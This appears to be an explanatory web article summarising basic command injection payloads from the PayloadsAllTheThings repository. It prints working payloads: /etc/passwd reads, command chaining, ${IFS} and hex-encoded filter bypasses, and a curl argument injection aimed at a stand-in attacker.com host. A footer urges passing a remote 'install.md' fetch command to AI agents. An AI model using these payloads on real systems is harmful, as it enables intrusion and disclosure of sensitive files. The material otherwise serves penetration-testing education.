Basic Command Injection Payloads: Essential Techniques from PayloadsAllTheThings

Basic command injection payloads allow attackers to execute arbitrary OS commands by injecting shell metacharacters into vulnerable applications that incorporate unsanitized user input into system calls.

The PayloadsAllTheThings repository maintains a curated collection of security testing payloads used by penetration testers and bug bounty hunters worldwide. This article examines the basic command injection payloads documented in the Command Injection/README.md file, providing practical examples of how simple shell syntax can lead to OS-level command execution in vulnerable applications.

What Is Command Injection?

Command injection occurs when an application incorporates unsanitized user input into a shell command. According to the PayloadsAllTheThings source code, attackers inject additional commands or arguments, causing the underlying operating system to execute arbitrary code ranging from information disclosure (e.g., reading /etc/passwd) to full system compromise.

The repository organizes these techniques into categories including simple command syntax, command chaining, argument injection, and in-command tricks.

Core Command Injection Concepts

The Command Injection/README.md (lines 68-94) structures basic techniques into four fundamental building blocks that form the foundation for advanced exploitation.

Simple Command Execution

Direct command execution happens when user input passes unfiltered to a system shell. The simplest payload executes a standalone command.

cat /etc/passwd

This payload returns the contents of the password file on Unix-like systems when the injection point is passed directly to a shell interpreter.

Command Chaining Operators

Shell operators combine multiple commands sequentially or conditionally. The repository documents these operators in the Chaining Commands section (lines 81-96).

  • ; - Sequential execution regardless of success
  • && - Conditional execution (second command runs only if first succeeds)
  • || - Alternative execution (second command runs if first fails)
  • **| ** - Pipe output from first command to second
  • & - Background execution (detaches process)

Argument Injection

When the base command is fixed and cannot be changed, attackers append malicious arguments to existing commands. This technique exploits vulnerable flags in utilities like curl or ssh.

curl http://attacker.com -o$(id)

This forces curl to write output using a filename derived from the id command execution.

In-Command Substitution

Backticks or $() syntax executes commands within the original command string, substituting the output into the parent command.

`whoami`
$(cat /etc/passwd)

Practical Basic Command Injection Payloads

These examples map directly to the payload sections in the Command Injection/README.md, specifically the Basic Commands (lines 68-78), Chaining Commands (lines 81-96), and Bypass Without Space (lines 56-63) sections.

Reading Sensitive Files

The most basic reconnaissance payload reads system files:

cat /etc/passwd

Chaining Multiple Commands

Execute reconnaissance commands in sequence using the semicolon operator:

ls -la; whoami

For conditional execution that only proceeds if the first command succeeds:

id && echo "User identified"

Bypassing Space Filters

When applications filter literal spaces, use the Internal Field Separator ($IFS) variable:

cat${IFS}/etc${IFS}/passwd

Alternatively, employ brace expansion to execute multiple commands without spaces:

{id,uname -a}

Hex-Encoded Payloads

Avoid character filters using hex-encoded strings that decode at execution time:

echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"

When executed inside a command injection point, this decodes to cat /etc/passwd.

Background Execution

Detach long-running processes that persist after the parent process ends:

nohup sleep 300 > /dev/null 2>&1 &

Repository Structure and Key Files

The PayloadsAllTheThings project follows a modular architecture designed for easy navigation and contribution:

  • README.md (root) - High-level overview, navigation guide, and contribution instructions for the entire project
  • Command Injection/README.md - Central catalog containing basic payloads, methodology, filter bypasses, and external lab references (lines 56-96)
  • Command Injection/ directory - Houses specific payload categories and references to automation tools like commix and interactsh
  • _template_vuln/README.md - Template structure illustrating the repository's standardized format for vulnerability categories

Summary

  • Basic command injection payloads exploit unsanitized input to execute OS commands through direct shell metacharacter injection.
  • Command chaining using operators like ;, &&, and || enables sequential or conditional execution of multiple commands in a single injection point.
  • Filter bypasses such as ${IFS}, brace expansion, and hex encoding evade naive input validation that blocks spaces or special characters.
  • The Command Injection/README.md file in the PayloadsAllTheThings repository provides copy-paste payloads organized by technique for penetration testing education.

Frequently Asked Questions

What is the most basic command injection payload?

The simplest payload is a direct system command like cat /etc/passwd or whoami that executes when user input reaches a shell interpreter without sanitization. According to the PayloadsAllTheThings source code, this represents the foundation upon which more complex chaining and bypass techniques are built.

How do you bypass space filters in command injection?

Use the ${IFS} variable (Internal Field Separator) in place of literal spaces, such as cat${IFS}/etc/passwd, or employ brace expansion syntax like {id,uname -a} to execute commands without whitespace. These techniques are documented in the Bypass Without Space section (lines 56-63) of the Command Injection/README.md.

What is the difference between command chaining and argument injection?

Command chaining uses operators like ; or && to append entirely new commands to the shell input stream, while argument injection exploits fixed base commands by appending malicious flags or values (e.g., -o$(id) in curl) when the original command cannot be replaced.

Where can I practice command injection safely?

The Command Injection/README.md references external labs including PortSwigger Web Security Academy labs, which provide legal, isolated environments for practicing these techniques without affecting production systems. The repository also lists tools like commix for automated detection in controlled testing environments.

Have a question about this repo?

These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:

Share the following with your agent to get started:
curl -s "https://instagit.com/install.md"

Works with
Claude Codex Cursor VS Code OpenClaw Any MCP Client

Maintain an open-source project? Get it listed too →